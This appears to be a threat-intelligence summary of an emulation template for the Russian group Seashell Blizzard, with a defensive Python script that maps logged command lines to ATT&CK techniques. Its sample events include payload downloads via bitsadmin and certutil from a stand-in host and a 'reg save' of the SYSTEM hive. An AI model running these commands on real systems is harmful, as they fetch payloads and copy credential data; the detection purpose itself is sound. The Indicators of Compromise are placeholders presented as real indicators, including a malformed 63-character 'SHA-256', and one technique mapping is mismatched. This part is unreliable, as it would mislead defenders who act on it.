Emulating the Sophisticated Russian Adversary Seashell Blizzard

Seashell Blizzard, also known as APT44, is a highly sophisticated Russian adversary linked to military intelligence. It targets a range of critical sectors to conduct espionage through persistent access and custom tooling. The AttackIQ assessment template helps organizations validate their security controls against this threat. Affected sectors: energy, telecommunications, government, military, transportation, manufacturing, retail.

Key points:

  • Seashell Blizzard is associated with Russian military intelligence Unit 74455 (GRU).
  • The group has been active since at least 2009, targeting organizations globally.
  • Focused sectors include energy, telecommunications, government, military, transportation, manufacturing, and retail.
  • Operations are characterized by persistent access, espionage activities, and the use of both custom-developed and publicly available tools.
  • Particularly targets Industrial Control Systems (ICS) and SCADA systems.
  • AttackIQ released a new assessment template for validating security controls against Seashell Blizzard’s tactics.
  • The BadPilot campaign utilizes spear-phishing and exploits vulnerabilities for initial network access.
  • Assessment template divides tactics and techniques for evaluating security defenses against the group.
  • Emphasizes the importance of ongoing validation and improvement of security postures.
  • AttackIQ provides AEV solutions and partners with MITRE for developing threat-informed defenses.

MITRE Techniques:

  • Create or Modify System Process: Windows Service (T1543.003): Leverages the sc command line tool to create a new service.
  • BITS Jobs (T1197): Uses bitsadmin to create a BITS job for downloading a remote payload.
  • System Network Configuration Discovery: Internet Connection Discovery (T1016.001): Executes certutil to download a file from a website.
  • OS Credential Dumping: Security Account Manager (T1003.002): Attempts to save a copy of the HKLM\SYSTEM registry hive using the reg save command.
  • System Owner/User Discovery (T1033): Executes whoami command to retrieve details about the running user account.
  • System Information Discovery (T1082): Executes systeminfo command to gather system information.
  • System Network Configuration Discovery (T1016): Executes arp -a to retrieve ARP information.
  • Ingress Tool Transfer (T1105): Details scenarios for downloading known malicious samples to disk.
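As an added example (not AttackIQ's template or code), the following Python triage routine maps process-creation command lines to the technique IDs listed above, so a defender can check whether endpoint telemetry surfaces each emulated step. The regular expressions are assumptions about how these commands typically appear in Sysmon or Security 4688 command-line fields, and the sample events are constructed, not real data.

```python
import re
from typing import Dict, List, Optional, Pattern, Tuple

# Technique IDs from the assessment summary paired with command patterns.
# The patterns are an assumption about typical command-line shapes, not a
# complete signature set; ordering decides which ID wins on overlap.
TECHNIQUE_PATTERNS: List[Tuple[str, Pattern[str]]] = [
    ("T1543.003", re.compile(r"\bsc(\.exe)?\s+create\b", re.I)),                 # sc create <svc>
    ("T1197",     re.compile(r"\bbitsadmin(\.exe)?\s+/(transfer|create|addfile)\b", re.I)),
    ("T1016.001", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),         # certutil download
    ("T1003.002", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I)),     # SYSTEM hive copy
    ("T1033",     re.compile(r"\bwhoami(\.exe)?\b", re.I)),
    ("T1082",     re.compile(r"\bsysteminfo(\.exe)?\b", re.I)),
    ("T1016",     re.compile(r"\barp(\.exe)?\s+-a\b", re.I)),
]

def classify(command_line: str) -> Optional[str]:
    """Return the first technique ID whose pattern matches, or None."""
    for technique_id, pattern in TECHNIQUE_PATTERNS:
        if pattern.search(command_line):
            return technique_id
    return None

def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group matching command lines by technique ID; unmatched events are dropped."""
    hits: Dict[str, List[str]] = {}
    for event in events:
        technique_id = classify(event["CommandLine"])
        if technique_id:
            hits.setdefault(technique_id, []).append(event["CommandLine"])
    return hits

# Constructed sample events shaped like process-creation log records (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": "C:\\Windows\\System32\\sc.exe", "CommandLine": 'sc create updsvc binPath= "C:\\ProgramData\\u.exe"'},
    {"Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /transfer job1 http://example.invalid/p.bin C:\\Users\\Public\\p.bin"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -urlcache -split -f http://example.invalid/t.txt t.txt"},
    {"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg save HKLM\\SYSTEM C:\\Users\\Public\\sys.hiv"},
    {"Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /all"},
    {"Image": "C:\\Windows\\System32\\systeminfo.exe", "CommandLine": "systeminfo"},
    {"Image": "C:\\Windows\\System32\\ARP.EXE", "CommandLine": "arp -a"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},  # benign control
]

if __name__ == "__main__":
    for technique_id, commands in sorted(triage(SAMPLE_EVENTS).items()):
        print(technique_id, commands)
```

Each technique on the page should produce exactly one hit against the sample set; a technique that produces none in your own telemetry is a visibility gap worth closing before the emulation is run for real.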

Indicators of Compromise:

  • [Domain] military[.]ru
  • [URL] http://malicious[.]com/path
  • [Email Address] attacker@example[.]com
  • [IPv4 Address] 192.168.1.1
  • [SHA-256] 3fa9b23456790abcdef1234567890abcdef1234567890123456789012345678


Full Story: https://www.attackiq.com/2025/04/02/emulating-seashell-blizzard/